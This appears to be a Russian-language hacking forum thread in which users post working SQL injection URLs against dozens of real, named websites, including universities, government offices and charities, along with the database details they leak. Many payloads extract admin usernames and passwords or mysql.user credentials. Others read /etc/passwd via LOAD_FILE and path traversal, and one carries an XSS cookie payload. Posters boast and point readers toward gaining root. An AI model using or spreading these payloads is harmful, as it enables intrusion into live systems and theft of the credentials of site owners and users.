http://grb.sonoma.edu/details.php?id=-305+union+select+1,2,3,4,5,6,7,8,9,concat(version( ),0x20,database(),0x20,user()),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
4.1.22-standard
grb
grb@paralleluniverse.sonoma.edu

http://imperial.ca.gov/dept.php?id=-32+union+select+concat(version(),0x20,database(),0 x20,user())--
5.0.27-community-nt
imperial
ricardohdz@localhost

http://start-chel.ru/catalog/?CatID=86+and+1=2+union+select+concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os)+--

version : 4.1.22-lk-log
user : startchelr@localhost
database : startchelr
os : pc-linux-gnu

http://www.cpen.com/artikel.php?aid=-49+union+select+1,2,3,4,concat(userName,char(58),U serEmail),6,7+from+users+limit+0,1--

PR-5

_http://www.uludag.edu.tr/uludagunien.php?kat=-5+union+select+1,2,3,4,5,6,7,version()
Database Version: 4.1.22

PR-8

админка - error 403

Сайт: http://www.seaes.manchester.ac.uk
ТИЦ: 20
PR: 7
Примеры запросов: http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os,0x0b),3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,tab le_name),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+inform ation_schema.tables--+

http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+all+select+1,group_concat(0x0b,user_emai l),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_c oncat(0x0b,user_name,0x3a,user_password),4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8+from+cpg132_users--+
version - 5.1.34-1-log
user - earthadmuser@abel.mc.man.ac.uk
database - earthadm
os - debian-linux-gnu

==========================================

Сайт: http://www.beoordeelmijnleraar.nl
ТИЦ: 0
PR: 3
Пример запроса: http://www.beoordeelmijnleraar.nl/sub.php?groupID=5&userID=4&ID=9999+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(mid(conca t_ws(0x0b,version(),user(),database(),@@version_co mpile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bml@localhost
database - bml
os - pc-linux-gnu

==========================================

Сайт: http://www.donkervoorttouringclub.nl
ТИЦ: 10
PR: 2
Пример запроса: http://www.donkervoorttouringclub.nl/splace/f.php?ID=11335+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - dtc_splace@localhost
database - dtc_splace
os - pc-linux-gnu

http://www.goudengravure.nl/goudengravure.php?ac=module&module=aanbod&id=-1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4, 5,6,7,8,9,10,11 from information_schema.tables limit 0,1+--+

User: u005893_bart@web7.c1.internal
Database: db005893_goude000
Version: 5.0.87-d10-ourdelta65-byte3+bytelenny1-log

http://www.mace.manchester.ac.uk/postgraduate/research/projects/description/?id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,database%28%29,v ersion%28%29%29+from+information_schema.tables+lim it+125,1%29,floor%28rand%280%29*2%29%29from%28info rmation_schema.tables%29group+by+2%29--++
User: mcgsswh@kepler.mc.man.ac.uk
Database: pip
Version: 5.1.34-1-log

http://www.acllf.org/album.php?type=centre&id=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4++
User: acllf@localhost
Database: acllf
Version: 5.0.51a-3ubuntu5.5

http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%2 9x%20GROUP%20BY%20CONCAT%28user%28%29,%20FLOOR%28R AND%280%29*2%29%29%29%20--
User: aresazi@web.ee.sun.ac.za
Database: aresazi
Version: 5.0.51a-3ubuntu5.5

вот очередная порция инъешек от меня=))
Вам осталось приложить немного усилий до получения полного рута...=))

П.С. Логины и пароли в открытом виде не выкладываю, кому надо, тот сам скопипастит линки в адрес=)

В основном сайты в зоне .edu

seafmd-rcu.oie.int
http://www.seafmd-rcu.oie.int/news.php?articleID=-65+union+select+concat(username,0x20,password),2,3 ,4,5+from+users+limit+4,1--

uselessjunk.com
http://www.uselessjunk.com/article_full.php?id=-13199+union+select+1,2,fld_password,4,5,6+from+tbl _admin--+


harrisburgu.edu
http://www.harrisburgu.edu/news/article.php?id=-610+and+1=2+union+select+1,concat(username,0x20,pa ssword),3,4+from+users+limit+3,1--

stnersess.edu
http://www.stnersess.edu/news/detail.php?id=-260+union+select+1,2,3,4,5,6,concat(password,0x20, userid),8+from+users--

mbc.edu
http://www.mbc.edu/news/r_detail.php?id=-1947+union+select+concat(Username,0x20,Password),2 ,3,4,5,6,7,8+from+tbladmin--

llk.media.mit.edu
http://llk.media.mit.edu/spotlight.php?id=-3+union+select+concat(User,0x20,Password),2,3,4,5+ from+mysql.user--

http://www.vostokagro.ru/content.php?id=90+and+(select+1+from+(select+count (0),concat((select+concat_ws(0x3a,database(),versi on(),user())),floor(rand(0)*2))+from+information_s chema.tables+group+by+2)a)--+
Database: u18876_3
Version: 5.0.88-log
User: u18876@10.10.227.511
PR: 3
ТИЦ: 120

http://www.redicecreations.com/article.php?id=7381'+and+(select+1+from+(select+co unt(0),concat((select+concat_ws(0x3a,database(),ve rsion(),user())),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+
Database: redicecreations
Version: 5.0.32-Debian_7etch11-log
User: redicecreations@srv48.
PR: 5
ТИЦ: 10

http://www.legovaz.spb.ru

http://www.legovaz.spb.ru/photogallery/photo.php?id=100+and+1=0+union+select+1,2,3,concat _ws%280x3a,user%28%29,database%28%29,version%28%29 %29,5--

User: legovaz_spb@fe79.hc.ru
Database: wwwlegovazru_spb
Version: 4.1.25-log

ТИЦ 10
ПР 1

http://www.supervolos.ru/index1.php?t=-1+union+select+1,2,3,concat_ws(char(58),@@version, user(),database(),@@version_compile_os),5,6,7,8+--

version : 5.0.54
user : z262240_igoruser@localhost
database : z262240_svolos
os : pc-linux-gnu

http://www.gdchivast.com/index.php?f=rendiandongtai&ac=read&id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),dat abase(),version()),4,5,6,7,8,9,10,11,12,13+--+
Version: 4.1.20
Database: gdchivast
User: gdchivast_f@localhost

http://www.samaranews.ru/

http://www.samaranews.ru/catalog/art/art.php?art=-1+and+1=2+union+select+1,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4,5, 6+--

version : 5.0.51a-community-nt-log
user : gb_samnews@10.0.2.3
database : gb_samnews
os : Win64

http://historywired.si.edu/object.cfm?ID=-1' or 1=@@version

http://www.soldesk-itacademy.co.kr/community/sub5_01.php?boardgubun=view&code=itbank_notice&page=1&id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws%280 x3a,user%28%29,database%28%29,version%28%29%29,10, 11,12,13,14,15,16,17,18,19,20%20--+
User: ksheco@localhost
Database: ksheco
Version: 4.0.20

http://gates.fr/europe/email/index.cfm?e_type=friend_brochure&ID=(select+top+1+password+from+users)

OS: Windows NT 5.2 (Build 3790: Service Pack 2)
MSSQL_version: Microsoft SQL Server 2005 - 9.00.4053.00 (X64)

http://classes.dma.ucla.edu/Spring05/157A/cursos/157A/index_visor.php?id=1&ejercicio_id=9&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8+--+

http://www.sraad.com/print.php?id=-1%20UNION%20SELECt%201,2,3,4,5,concat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 %20--+
User: jaymack@localhost
Database: sraad
Version: 4.1.12a-nt

http://www.lelombard.com/Agenda/Detail.cfm?query_id=(select+top+1+table_name+from+ information_schema.columns+where+column_name=CHAR( 112)%2bchar(97)%2bchar(115)%2bchar(115)%2bchar(119 )%2bchar(111)%2bchar(114)%2bchar(100))--

OS: Windows NT 5.0 (Build 2195: Service Pack 4)
DB_VERSION:Microsoft SQL Server 2000 - 8.00.818 (Intel X86)

http://www.prioninstitute.ca/index.php?page=webpages&menucat=24+and+(select+1+from+(select+count(0),con cat((select+concat(id,0x3a,username,0x3a,password, 0x3a,email)+from+admin_users+limit+0,1),floor(rand (0)*2))+from+information_schema.tables+group+by+2) a)--&id=17&action=displaypage&side=1

http://www.alpharent.gr/gr/news.php?id=1+union+/*!select+1,2,concat(0x7c,user_id,0x7c,user_login,0 x7c,user_password,0x7c,user_name,0x7c,user_email,0 x7c),4+from+users*/--

http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,concat(uId,0x3a, 0x3a,uFullName,0x3a,0x3a,uEmail,0x3a,0x3a,uPasswor d),5+FROM+tb_users+LIMIT+0,1%23&news=showall

http://web1321.anna.webhoster.ag/detail.php?id=-1%20UNION%20SELECT%201,2,3,4,5,concat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11,12,13,14,15%20--+
User: web1321@localhost
Database: usr_web1321_1
Version: 5.0.77

Федерация Бодибилдинга и Фитнеса России

http://www.fbfr.ru/index.php?lan=ru&cont=news&id=-287+and+1=2+union+select+1,2,3,4,concat_ws(char(58 ),@@version,user(),database(),@@version_compile_os ),6,7+--

version : 4.1.22-max
user : whbody1@localhost
database : whbody1
os : unknown-freebsd6.0

http://www.vino-concept.ch/content.php?id=-189+UNION+SELECT+1,2,3,concat(user(),char(58),vers ion(),char(58),database()),5

http://www.slicedgaming.com/blogs.php?staff_id=5 UNION ALL SELECT 1,%String_Col%,3,4,5--
Host IP: 67.205.52.7
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: slicedgaming

www.zhambyl.kz - Официальный сайт Акимата Жамбылской области

http://customers.zhambyl.kz/user_info.php?user_id=-45+union+all+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

5.0.51a-24+lenny2:wwwrun@localhost:contents

http://www.ac.edu/sports/new_showsport.php?sport_id=-10+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database(),@@version_compile_os),6,7,8--

PR-5

http://my-symbian.com/s60/software/category.php?fldAuto=30 UNION ALL SELECT 1,%String_Col%,3--
Host IP: 62.129.249.144
Web Server: IdeaWebServer/v0.70
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: my_symbian

http://jansdotter.com/shop/categ.php?category=17 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Host IP: 173.45.243.31
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: jansdotter

шоп
http://www.yaguza.com/category/category.php?categoryID=58 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10--
Host IP: 69.93.124.182
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: yaguza_test

http://www.inventiondb.com/view.php?id=546 UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8,9,10--
Host IP: 64.79.143.102
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8k DAV/2 PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL unknown ver
Current DB: irdb

http://www.woodworkersworkshop.com/resources/index.php?cat=9 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 72.167.35.10
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: probe

http://www.templateshunt.com/templatehunt.php?category=56 AND %True_Expression%
Host IP: 65.98.16.26
Web Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: temphunt_template


http://www.penfieldbooks.com/category.php?category=4 AND %True_Expression% AND 'x'='x
Host IP: 67.18.15.15
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: penfield4lkjslkf

хакИр ;)

http://biochem.uthscsa.edu/news_article.php?newsID=-23+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database(),@@version_compile_os)


PR-8

тИЦ-300

Страниц в Яндекс - 3878

edu

http://www.tolani.edu/tmi/index.php?id=107 UNION ALL SELECT %String_Col%,2,3--

Host IP: 208.115.32.44
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 PHP/5.2.11
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: tolanie_tmiphp


http://wsm.wsu.edu/s/index.php?id=744 UNION ALL SELECT %String_Col%,2--

Host IP: 134.121.140.52
Web Server: Microsoft-IIS/7.5
Powered-by: PHP/5.2.13
Powered-by: ASP.NET
DB Server: MySQL unknown ver
Current DB: wsm_articles



http://www.brockport.edu/athletics/football/index.php?id=67 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20 and 'x'='x

Host IP: 137.21.162.30
Web Server: Apache
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: athletics



http://www.research.chop.edu/research/profiles/index.php?ID=927377 and 1=convert(int,%String_Col%) and '1'='1

Host IP: 159.14.240.240
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MSSQL 2000 with error
Current DB: StokesIntranetWeb


http://envs.uoregon.edu/alumni/index.php?id=92 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Host IP: 128.223.21.97
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7l PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL >=5
Current DB: alumni


http://vesta.cumc.columbia.edu/dermatology/index.php?id=%27jt165 AND %True_Expression%
Host IP: 156.111.235.215
Web Server: Apache
Powered-by: PHP/5.1.4
DB Server: MySQL
Current DB:

http://www.mauifin.com/fin_info.php?id=-12+union+select+1,concat_ws(0x3a%20,user(),databas e(),version()),3,4,5,6,7--

User: irie_admin@localhost
Version: 5.0.90-community
Database: irie_info

Google PR: 4

PR - 4
http://www.iksbv.nl/english/news.php?ID=-7+union+select+1,2,3,4,concat_ ws(0x3a,version(),datab ase(),user()),6--
Version:4.1.25
User:iksbv
Database:iksbv@localhost

----------------------------------

Pr - 2 :(
http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_w s(0x3a,version(),data base(),user()),5--

Version:5.0.27-log
User:btt
Database:btt@localhost
os:redhat-linux-gnu



зверяка:
http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_ws(0x3a,loginname,pas s word,privs),5+from+yann sms_members--


----------------------------------

Pr - 4

http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,vers ion(),database(),user() ),4,5,6, 7,8--

Version:5.0.84-0.dotdeb.0-log
Username:ommenlee
Database:ommenlee@localhost
OS:debian-linux-gnu

http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6 ,7,8+from+grafic oncept_users+limit+0,1--

Российский Красный Крест

http://www.rokk.ru/index.php?cat=50&item=-21+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 ,6,7,8,9,10,11,12,13+--

version : 5.1.30
user : rokk@localhost
database : rokk
os : portbld-freebsd6.0

http://wildpartygames.com/product.php?product_id=999999'+union+select+1,2,co ncat_ws(0x3a%20,user(),database(),version()),4,5,6 ,7,8,9/*

User: wpg@localhost
Version: 4.1.22
Database: wpg

Memorial Web Site Script
http://everlastingmemories.org/show_memorial.php?id=139+and+1=2+union+all+select+ 1,2,group_concat(username,char(58),password),4,5,6 ,7,8+from+admin--


http://updikefuneralhome.com/memorial/show_memorial.php?id=332+and+1=2+union+all+select+ 1,2,group_concat(username,char(58),password),4,5,6 ,7,8+from+admin--

www.dashboardwidgets.com/showcase/showcat.php?cid=-43 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15--

http://edu-chem.co.uk/product.php?product_id=-29+union+select+1,2,3,concat_ws(user(),version(),d atabase(),@@version_compile_os),5,6,7,8,9,10,11,12

PR - 6

http://www.karamuzejs.lv/index.php?id=-2+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,version(),data base(),user()),0x71),0x71),4,5--

Version : 4.1.11-standard
Database : karamuzejs_gov_lv_-_karamuzejs
User : muzejnieks@localhost
OS : pc-linux-gnu

+--------------------------------------------+

PR - 5

http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),da tab ase(),user())%20,6,7,8,9--
Version : 5.0.27
Database : lv-tmf
User : root@localhost
OS : redhat-linux-gnu

/etc/passwd
http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,LOAD_ FILE(0x2f6574632f706173737764),6,7,8,9--

мой первый пост на ачате :-D

http://www.upennrrtc.org/project/products/view.php?id=-23+union+select+1,2,group_concat(user_username,0x3 a,user_password,0x0b),4,5,6+from+user/*


http://www.euroizol.com.ua/products/view.php?id=-10+union+select+1,2,3,4,5,6,7,group_concat(us_logi n,0x3a,us_pass,0x0b),9,10,11,12,13,14,15,16,17+fro m+ei_users

http://www.promethean-editions.com/php/NewsDetail.php?ID=-142+union+select+1,2,3,4,version(),6,7,8,9,0,11,12 ,13,14/*

Database Version: 4.0.27-standard-log
Database name: pelprod
User name: ross@202.191.42.50

-----------------------------------------------------------------------------------------------------

http://www.fundacionapoye.org/php/ampliar_general_indice.php?id=6&clave=-2+union+select+1,version(),3,4,5--

Database Version: 5.0.87-a2hosting-percona
Database name: apoye_fapoye
User name: apoye_edison@localhost

-----------------------------------------------------------------------------------------------------

http://ffg.jeudego.org/php/affichePersonne.php?id=7921'

Database Version: 5.0.51a-24+lenny3
Database name: ffg
User name: lecteur@localhost

PR - 5

http://www.detki.lv/baika.php?id=-126+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt (concat_ws(0x3a,ve rsion(),database(),user()),0x71),0x71)--

Version : 4.1.15-Debian_1ubuntu5-log
Database : c_detki
User : detki@92.240.65.137

+---------------------------------------------+

PR - 5

http://www.lob.lv/lv/aktualitates.php?id=-325+union+select+concat_ws(0x3a,version(),dat abase(),user()),2--

Version : 5.1.25-rc-standard
Database : lob_lv
User : lob@andriseglitis.com
OS : pc-solaris2.10

http://www.lob.lv/lv/aktualitates.php?id=-325+union+select+concat_ws(0x3a,username,user_pass word,user_ level),2+from+ph pbb_users+limit+1,1--

эта самая тупая скуля, там море таблиц, и все на латвийском :( каждая таблица это translate :mad: в итоге добрался до phpbb и забил :cool:

http://www.rusbiotech.ru/novice/show.php?id=-440+union+select+1,2,version(),4,5,6,7,8,9,10--

.IR

http://www.teo.ir/gorooha/4/index.php?id=1 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Host IP: 91.98.99.162
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: io


http://www.womennews.ir/index.php?id=40 AND %True_Expression%

Host IP: 207.210.118.213
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: ,

Иран....... ;) чот нигде не встречал скули , решил найти и запостить

http://www.concellotui.org/php/noticias.php?id=688+union+select+1,2,3,4,version() ,6,7,8,9/*

Database Version: 4.1.22
Database name: qai608
User name: qai608@217.76.131.103

-----------------------------------------------------------------------------------------------------------------

http://www.christianword.org/php/default.php?page_id=view_testimony&id=-499+union+select+1,version(),3,4,5--

Database Version: 5.0.90-community
Database name: mobil0_cwm
User name: mobil0_server1@localhost

----------------------------------------------------------------------------------------------------------------------------

http://www.kummarashalivahana.org/php/greatprofiles_details.php?id=-51+union+select+1,version(),3,4,5,6,7,8--

5.0.67.d7-ourdelta-log

----------------------------------------------------------------------------------------------------------------------------

http://www.wolfdog.org/php/modules.php?op=modload&name=WolfdogShows&newlang=eng&file=successes&id=-8372+union+select+version(),2--

Database Version: 5.0.87-b20-log
Database name: wolfdog_dbase
User name: wolfdog_user@s1.hostpark.pl

-----------------------------------------------------------------------------------------------------------------------------

http://www.timothysmithnetwork.org/courseDetails.php?id=-1652+union+select+1,2,3,4,5,version(),7,8,9,0,11,1 2,13,14,15,16,17,18--

Database Version: 5.0.67-log
Database name: timothy_smith_network
User name: timothy_smith@win.beza.net

http://www.promd.us/news.php?cat=-2+/*!union*/+select+1,CONCAT(userId,0x7c,fName,0x7c,lName,0x7c ,0x7c,userName,0x7c,password,0x7c,email),3,4+from+ promd_admin_users+LIMIT+0,1--&id=7

http://propool.info/articles.php?id=-37+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+vh04971.bb_users+limit+3,1--

http://art.specialradio.ru/print.php?id=-247+union+select+1,concat_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9+from+artbaze_specialradio_ru .phpbb_users+limit+1,1--

http://www.sea-angels.ru/index.php?id=-51+union+select+1,concat_ws(0x3a,converge_id,conve rge_pass_hash,converge_pass_salt),3,4,5,6,7,8+from +u46830.fib_sa_members_converge--

http://vn.ru/index.php?id=-100301+union+select+1,concat_ws(0x3a,name,member_l ogin_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25+from+sibkray_site.ibf_member s--

http://www.mwe-design.ru/view.php?id=-1978+union+select+1,2,3,4,5,concat_ws(0x3a,user_lo gin,user_pass),7,8,9,10,11+from+u56665_belosn.wp_u sers--

http://www.gisa.ru/info_see.php?id=-1978+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+inf ormation_schema.tables+limit+61,1--

http://megaspravka.ru/viewcat.php?id=-474+union+select+1,concat_ws%280x3a,username,userp ass%29,3,4,5,6,7+from+nakavkaz_megaspravka.cat_use rs--

http://www.ruscargoservice.ru/auto_info.php?id=-474+UNION+SELECT+1,concat_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26+from+u45320.phpbb_users+lim it+1,1--

http://www.emeraldshoresrealty.net/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.listahouserealty.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.homesbytaber.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://heidelberg-housing.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://empaash.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.barnards-svg.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://gigisexclusive.co.za/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.valuezoneltd.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.french-property-homes.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.talkofnc.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.myholidaysintenerife.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://rd4global.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://wirevip.com/joomla_catalog/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.rieltgarant.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--

http://www.almenhaj.net/Report.php?linkid=-6878+union+select+1,2,3,4,5,concat_ws(0x3a%20,user (),database(),version()),7,8,9,10,11,12,13--


User: abuzooz@boscgi1903.eigbox.net
Version: 5.0.45-log
Database: future

SQL Inj

http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user&type=agenda

+Include

http://iep.univ-lille2.fr/lib/tele.php?chemin=../../../../../../../../etc/passwd

+XSS

http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,<img src=https://forum.antichat.ru/antichat/pic/logo.gif></img><script>alert(document.cookie)</script>,5,6,7,8+from+mysql.user&type=agenda

PR-7

******* :)

Сайт: http://www.lahdenmuseot.fi
ТИЦ: 20
PR: 4
Пример запроса: http://www.lahdenmuseot.fi/main.php?id=1'+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os,0x0b),1,63),+floor(rand(0)*2)))--+
version - 5.0.77
user - root@localhost
database - mg:lahdenmuseot
os - redhat-linux-gnu

============================================

Сайт: http://beta.weetwaar.com
ТИЦ: 0
PR: ?
